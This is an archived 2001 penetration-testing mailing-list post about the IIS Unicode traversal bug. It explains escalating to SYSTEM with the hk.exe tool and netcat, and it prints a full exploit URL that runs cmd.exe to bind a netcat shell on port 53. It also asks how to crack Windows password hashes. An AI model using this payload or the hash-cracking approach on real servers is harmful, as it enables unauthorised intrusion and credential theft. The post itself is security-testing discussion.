Penetration Testing mailing list archives

Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug?

From: Renato Ettisberger <renato.ettisberger () CH PWCGLOBAL COM>
Date: Tue, 27 Mar 2001 09:47:52 +0200

Hi there,

As you know, there is a way to span a shell with admin rights on a IIS
4.0
with the Unicode bug.

What way? Did you use CmdAsp.ASP to do that? Is it possible?

No, I use the tool hk.exe from RAZOR. With this tool, you can launch a
cmd.exe with system
privileges. Upload hk.exe and netcat to the server. The following URL binds
a netcat server
with system privileges on port 53 (this workes fine on our test server
IIS4.0, NT engl. Version)

http://www.target.com/msadc/..%c0%af../%c0%af../%c0%af../winnt/system32/cmd.exe?/c+c:

winnt\system32\hk.exe+cmd+/c+nc.exe+"-n"+"-l"+"-v"+"-p"+53+"-e"+cmd.exe

Form more information about that, see our article at:

http://www.dmzsystems.com/en/articles/windows/iis/IISUnicodeBug.htm

BTW: My question is, how can I crack the password hash, when it comes in
the following form:

F:0x020020000000000000000000....
V:0x00000000a800000......

regards
Renato

P.S: My English is not bad, it's horrible, but I hope you understand what
I'm talking about ;-)

computer.